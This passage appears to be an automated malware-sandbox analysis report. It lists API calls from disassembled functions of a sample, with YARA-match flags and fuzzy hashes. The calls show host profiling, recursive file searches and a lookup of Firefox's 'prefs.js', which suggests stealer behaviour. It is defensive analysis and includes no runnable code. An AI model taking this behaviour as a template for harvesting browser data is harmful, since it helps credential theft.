                                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Virtual$AllocFree
                                                  • String ID:
                                                  • API String ID: 2087232378-0
                                                  • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                  • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                  • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                  • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                  APIs
                                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                  • ExitProcess.KERNEL32 ref: 004011C6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$Process$AllocName$ComputerExitUser
                                                  • String ID:
                                                  • API String ID: 1004333139-0
                                                  • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                  • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                                  • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                  • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02D19A86
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422568211.0000000002D19000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D19000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2d19000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction ID: 0b211559277fa09b384a9e92a6757c03272f1555c212598e5bf21c5d43cba274
                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction Fuzzy Hash: 16112A79A00208EFDB01DF98C995E98BBF5AF08350F058094F9489B361D371EA50DF90
                                                  APIs
                                                  • wsprintfA.USER32 ref: 004138CC
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                   • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                  • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                  • API String ID: 1125553467-817767981
                                                  • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                  • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                  • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                  • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                  APIs
                                                  • wsprintfA.USER32 ref: 0041492C
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                  • FindClose.KERNEL32(000000FF), ref: 00414B92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID: %s\%s$%s\%s$%s\*
                                                  • API String ID: 180737720-445461498
                                                  • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                  • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                                  • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                  • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                                  APIs
                                                  • wsprintfA.USER32 ref: 02F13B33
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 02F13B4A
                                                  • lstrcat.KERNEL32(?,?), ref: 02F13B9C
                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 02F13BAE
                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 02F13BC4
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F13ECE
                                                  • FindClose.KERNEL32(000000FF), ref: 02F13EE3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 1125553467-0
                                                  • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                  • Instruction ID: 908fc48404c02853de309fd45a784b5023e057150adc802fda709bb957b91b6e
                                                  • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                  • Instruction Fuzzy Hash: 08A152B5A40218ABDB34DFA4DD84FEE737AFB49340F4445C8A60D96180EB759B84CF62
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                  • wsprintfA.USER32 ref: 004145A6
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                                  • FindClose.KERNEL32(000000FF), ref: 004146A0
                                                  • lstrcatA.KERNEL32(?,02D4AE80,?,00000104), ref: 004146C5
                                                  • lstrcatA.KERNEL32(?,02D49E30), ref: 004146D8
                                                  • lstrlenA.KERNEL32(?), ref: 004146E5
                                                  • lstrlenA.KERNEL32(?), ref: 004146F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                  • String ID: %s\%s$%s\*
                                                  • API String ID: 13328894-2848263008
                                                  • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                  • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                                  • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                  • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                                  APIs
                                                  • wsprintfA.USER32 ref: 02F14B93
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 02F14BAA
                                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 02F14BD8
                                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 02F14BEE
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F14DE4
                                                  • FindClose.KERNEL32(000000FF), ref: 02F14DF9
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID:
                                                  • API String ID: 180737720-0
                                                  • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                  • Instruction ID: dfa8ed7a785a203c1de376d4afa7969e179dabb8e7afd8b5d844cd949b64c37d
                                                  • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                  • Instruction Fuzzy Hash: CD617AB5A40218BBCB24EBE0DD84FEA73BDFB49701F44458CA60D96180EB75A745CF91
                                                  APIs
                                                  • wsprintfA.USER32 ref: 00413EC3
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                                  • FindClose.KERNEL32(000000FF), ref: 00414081
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID: %s\%s
                                                  • API String ID: 180737720-4073750446
                                                  • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                  • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                                  • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                  • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02F147E7
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F147EE
                                                  • wsprintfA.USER32 ref: 02F1480D
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 02F14824
                                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 02F14852
                                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 02F14868
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F148F2
                                                  • FindClose.KERNEL32(000000FF), ref: 02F14907
                                                  • lstrcat.KERNEL32(?,0064A524), ref: 02F1492C
                                                  • lstrcat.KERNEL32(?,0064A22C), ref: 02F1493F
                                                  • lstrlen.KERNEL32(?), ref: 02F1494C
                                                  • lstrlen.KERNEL32(?), ref: 02F1495D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                  • String ID:
                                                  • API String ID: 671575355-0
                                                  • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                  • Instruction ID: 0f658da4b5cb24a936fe649ef21efd189a51d3c8617ed8b67d977443932052f1
                                                  • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                  • Instruction Fuzzy Hash: 885177B5980218ABD724EBB0DD89FEE737DEB54740F804588E60D92190EB749B84CF91
                                                  APIs
                                                  • wsprintfA.USER32 ref: 02F1412A
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 02F14141
                                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 02F1416F
                                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 02F14185
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F142D3
                                                  • FindClose.KERNEL32(000000FF), ref: 02F142E8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID:
                                                  • API String ID: 180737720-0
                                                  • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                  • Instruction ID: c6082c9b236f74da3110815e13aea396ed5cf54601e4e34fec3ab47aaeed863d
                                                  • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                  • Instruction Fuzzy Hash: DA5173B6900218BBDB24FBB0DD84EEA737DBB84340F404588A74992080EB75E785CF95
                                                  APIs
                                                  • wsprintfA.USER32 ref: 0040ED3E
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                                  • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID: %s\*.*
                                                  • API String ID: 180737720-1013718255
                                                  • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                  • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                                  • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                  • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                                  • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                  • String ID: 4@$\*.*
                                                  • API String ID: 2325840235-1993203227
                                                  • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                  • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                                  • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                  • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                  • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID: prefs.js
                                                  • API String ID: 3334442632-3783873740
                                                  • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                  • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                  • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                  • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                  • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Similarity
                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                  • String ID: \*.*
                                                  • API String ID: 1415058207-1173974218
                                                  • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                  • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                                  • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                  • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                                  APIs
                                                  • wsprintfA.USER32 ref: 02F0EFA5
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 02F0EFBC
                                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 02F0F012
                                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 02F0F028
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F0F515
                                                  • FindClose.KERNEL32(000000FF), ref: 02F0F52A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID:
                                                  • API String ID: 180737720-0
                                                  • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                  • Instruction ID: 4bd948c3a4cbedaf39d8cffb3d124bb190ecd4e532b66bac7223ab867cb530b5
                                                  • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                  • Instruction Fuzzy Hash: 1EE103729122189ADB69FB60DD90EEE773AAF54740F8041DDB60A62091EF306FC9CF51
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
